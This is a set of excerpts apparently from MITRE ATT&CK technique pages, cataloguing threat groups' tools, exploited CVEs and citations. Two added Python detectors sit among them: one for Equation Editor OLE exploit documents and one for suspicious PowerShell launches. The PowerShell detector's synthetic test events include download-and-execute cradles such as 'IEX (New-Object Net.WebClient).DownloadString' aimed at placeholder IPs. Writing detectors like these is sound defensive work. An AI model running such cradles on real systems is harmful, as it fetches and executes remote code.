…up Gorgon Group has obtained and used tools such as QuasarRAT and Remcos. [40] G0100 Inception Inception has obtained and used open-source tools such as LaZagne. [41] G0136 IndigoZebra IndigoZebra has acquired open source tools such as NBTscan and Meterpreter for their operatio…
…December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. Microsoft Threat Intelligence. (2024, October 31). Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network. Retrieved June…
…IcedID has been delivered via phishing e-mails with malicious attachments. [93] G0100 Inception Inception has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise. [94] [95] [96] [97] G0136 IndigoZebra IndigoZebra sent spearphishing…
…December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Per…
…has been delivered via phishing e-mails with malicious attachments. [118] [119] G0100 Inception Inception has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise. [120] [121] [122] [123] G0136 IndigoZebra IndigoZebra sent spearphis…
…oad. [43] G0126 Higaisa Higaisa has exploited CVE-2018-0798 for execution. [44] G0100 Inception Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution. [45] [46] [47] [48] S0260 InvisiMole InvisiMole has installed legitimate but vulne…
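Two of the CVEs listed for Inception above, CVE-2017-11882 and CVE-2018-0802, are bugs in the Equation Editor component (EQNEDT32.EXE) that Office loads when a document embeds an OLE object of class Equation.3; the other two target different components (CVE-2012-0158 the MSCOMCTL ActiveX control, CVE-2014-1761 the RTF parser) and are not covered here. The script below is an added triage example, not code from the ATT&CK page or from any report it cites. It looks for the Equation.3 object in an RTF (`\objclass`, the hex `\objdata` blob, and `\objupdate`, which makes the object activate on open without a click) and in an OOXML document (`word/embeddings/*.bin` carrying the Equation.3 CLSID or the `Equation Native` stream name). The RTF and DOCX inputs are constructed inline and are not real malware; real exploit documents often obfuscate control words and the objdata hex, so treat this as a first pass rather than a parser.

```python
import io
import re
import zipfile

# Microsoft Equation 3.0 ("Equation.3") class id {0002CE02-0000-0000-C000-000000000046},
# as it appears little-endian inside OLE structures.
EQUATION_CLSID_LE = bytes.fromhex("02ce020000000000c000000000000046")
# Compound File Binary (OLE2) magic that every embedded oleObject*.bin starts with.
OLE_CFB_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")
# CFB directory entry names are UTF-16LE; Equation objects carry this stream.
EQUATION_STREAM_UTF16 = "Equation Native".encode("utf-16-le")

OBJCLASS_RX = re.compile(r"\\\*\\objclass\s+([^\s{}\\]+)")
OBJDATA_RX = re.compile(r"\\\*\\objdata\s*([0-9a-fA-F\s]+)")
OBJUPDATE_RX = re.compile(r"\\objupdate(?![a-z])")


def _hex_to_bytes(blob):
    """Decode the hex dump in \\objdata, tolerating the line breaks RTF writers insert."""
    clean = re.sub(r"[^0-9a-fA-F]", "", blob)
    return bytes.fromhex(clean[: len(clean) & ~1])


def _ole_indicators(blob):
    hits = []
    if b"Equation.3" in blob:
        hits.append("OLE1 header names Equation.3")
    if EQUATION_CLSID_LE in blob:
        hits.append("Equation.3 CLSID present")
    if EQUATION_STREAM_UTF16 in blob:
        hits.append("'Equation Native' stream present")
    return hits


def scan_rtf(data):
    text = data.decode("latin-1")
    hits = []
    for m in OBJCLASS_RX.finditer(text):
        if m.group(1).lower().startswith("equation"):
            hits.append("objclass " + m.group(1))
    if OBJUPDATE_RX.search(text):
        hits.append("objupdate set (object activates on open, no click needed)")
    for m in OBJDATA_RX.finditer(text):
        hits.extend(_ole_indicators(_hex_to_bytes(m.group(1))))
    return hits


def scan_ooxml(data):
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if "/embeddings/" not in name:
                continue
            blob = zf.read(name)
            if blob.startswith(OLE_CFB_MAGIC):
                hits.extend(name + ": " + h for h in _ole_indicators(blob))
    return hits


def scan(data):
    """Dispatch on container type; anything else is out of scope for this heuristic."""
    if data.startswith(b"{\\rtf"):
        return scan_rtf(data)
    if data.startswith(b"PK\x03\x04"):
        return scan_ooxml(data)
    return []


# --- constructed samples (synthetic, not real exploit documents) -----------------
SAMPLE_RTF = (
    rb"{\rtf1\ansi{\object\objemb\objupdate{\*\objclass Equation.3}{\*\objdata "
    b"01050000" b"02000000" b"0b000000"          # OLE1: version, embedded, classname length 11
    b"4571756174696f6e2e3300"                    # "Equation.3\0"
    b"00000000" b"00000000" b"08000000"          # topic/item name lengths, native data size
    + OLE_CFB_MAGIC.hex().encode() + b"}}}"
)


def _build_docx(embedding=None):
    """Minimal in-memory .docx; only the embeddings folder matters for the check."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if embedding is not None:
            zf.writestr("word/embeddings/oleObject1.bin", embedding)
    return buf.getvalue()


SAMPLE_DOCX_EQUATION = _build_docx(
    OLE_CFB_MAGIC + b"\x00" * 24 + EQUATION_STREAM_UTF16 + EQUATION_CLSID_LE
)
SAMPLE_DOCX_BENIGN = _build_docx()

if __name__ == "__main__":
    for label, doc in [("rtf", SAMPLE_RTF), ("docx", SAMPLE_DOCX_EQUATION), ("benign", SAMPLE_DOCX_BENIGN)]:
        print(label, scan(doc))
```

Run it as-is to see the three verdicts, or point `scan()` at the bytes of a quarantined attachment. A hit on `objupdate` together with an Equation.3 object is the combination worth escalating; an Equation object alone still appears in old, legitimate documents.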
…s a backdoor through which remote attackers can read data from files. [59] [60] G0100 Inception Inception used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host. [61] S0260 InvisiMole InvisiMole can collect data from the system, and can monito…
…eat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021. F-Secure Lab…
…D has been executed through Word documents with malicious embedded macros. [79] G0100 Inception Inception lured victims into clicking malicious files for machine reconnaissance and to execute malware. [80] [81] [82] [83] G0136 IndigoZebra IndigoZebra sent spearphishing emails con…
…werShell cmdlets New-MailboxSearch and Get-Recipient for discovery. [135] [136] G0100 Inception Inception has used PowerShell to execute malicious commands and payloads. [137] [138] G0119 Indrik Spider Indrik Spider has used PowerShell Empire for execution of malware. [139] [140]…
…nds. [92] S0170 Helminth One version of Helminth uses a PowerShell script. [93] G0100 Inception Inception has used PowerShell to execute malicious commands and payloads. [94] [95] G0119 Indrik Spider Indrik Spider has used PowerShell Empire for execution of malware. [96] [97] S03…
…eat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. Victor, K. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading. Retrieved May 26, 2020. Szappanos…
…rs Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018. Volexity Threat Research. (2024, April 12). Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400). Retrieved Nov…
…werShell cmdlets New-MailboxSearch and Get-Recipient for discovery. [148] [149] G0100 Inception Inception has used PowerShell to execute malicious commands and payloads. [150] [151] G0119 Indrik Spider Indrik Spider has used PowerShell Empire for execution of malware. [152] [153]…
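The PowerShell rows above (Inception running commands and payloads through PowerShell, Indrik Spider launching malware with PowerShell Empire) share a launch shape that process-creation telemetry exposes: a powershell.exe command line with profile and window suppressed and either an `-EncodedCommand` blob or an inline download cradle. The script below is an added example, not code from the ATT&CK page or the reports it cites. It decodes the encoded command (UTF-16LE under base64, which is what PowerShell expects) and scores launch flags and cradle tokens across the command line plus the decoded text. The events, the weights and the alert threshold are this example's own constructions; the `-noP -sta -w 1 -enc` form of the third event mirrors the shape Empire's stager has used, but the payload here is synthetic.

```python
import base64
import binascii
import re

# Weights and threshold are this example's choice, tuned so that encoding alone
# or an admin's "-NoProfile -ExecutionPolicy Bypass -File" does not alert.
LAUNCH_FLAGS = [
    (re.compile(r"-nop(?:rofile)?\b", re.I), "profile suppressed (-nop)"),
    (re.compile(r"-noni(?:nteractive)?\b", re.I), "non-interactive (-noni)"),
    (re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I), "window hidden (-w hidden)"),
    (re.compile(r"-e(?:xec(?:utionpolicy)?|p)\s+bypass\b", re.I), "execution policy bypassed"),
]
CRADLE_TOKENS = [
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"net\.webclient", re.I), "Net.WebClient"),
    (re.compile(r"download(?:string|file)", re.I), "DownloadString/DownloadFile"),
    (re.compile(r"frombase64string", re.I), "FromBase64String"),
]
# Any unambiguous prefix of -EncodedCommand is accepted by powershell.exe (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)
ALERT_THRESHOLD = 4


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64."""
    for m in ENC_FLAG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # -ep, -ExecutionPolicy and friends also start with "-e"
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            return None
        return raw.decode("utf-16-le", errors="replace")
    return None


def score_powershell(cmdline):
    score, reasons = 0, []
    for rx, label in LAUNCH_FLAGS:
        if rx.search(cmdline):
            score += 1
            reasons.append(label)
    decoded = decode_encoded_command(cmdline)
    text = cmdline
    if decoded is not None:
        score += 2
        reasons.append("encoded command")
        text = cmdline + " " + decoded  # cradle tokens usually hide inside the blob
    for rx, label in CRADLE_TOKENS:
        if rx.search(text):
            score += 2
            reasons.append(label)
    return score, reasons


def triage(events):
    """events: iterable of dicts with host/image/cmdline, e.g. flattened Sysmon EID 1 records."""
    alerts = []
    for ev in events:
        if "powershell" not in ev["image"].lower():
            continue
        score, reasons = score_powershell(ev["cmdline"])
        if score >= ALERT_THRESHOLD:
            alerts.append({"host": ev["host"], "score": score, "reasons": reasons})
    return alerts


# --- constructed sample telemetry (synthetic hosts, addresses and scripts) --------
def _encode(script):
    return base64.b64encode(script.encode("utf-16-le")).decode()


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "ws01", "image": PS_IMAGE,
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"host": "ws02", "image": PS_IMAGE,
     "cmdline": "powershell.exe -EncodedCommand " + _encode("Get-Date")},
    {"host": "ws03", "image": PS_IMAGE,
     "cmdline": "powershell.exe -noP -sta -w 1 -enc "
                + _encode("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/launcher')")},
    {"host": "ws04", "image": PS_IMAGE,
     "cmdline": "powershell -nop -w hidden -c \"IEX ((New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1'))\""},
    {"host": "ws05", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Only ws03 and ws04 cross the threshold: the backup script on ws01 and the harmless encoded `Get-Date` on ws02 each score 2, so the rule keys on the combination of suppressed UI, encoding and a cradle rather than on any one of them. Decoding the blob is the step that matters; matching on the base64 string itself would miss every re-encoded launcher.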
…eat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. Hamzeloofard, S. (2020, January 31). New wave of PlugX targets Hong Kong | Avira Blog. Retrieved April 13, 2021. Insikt Group…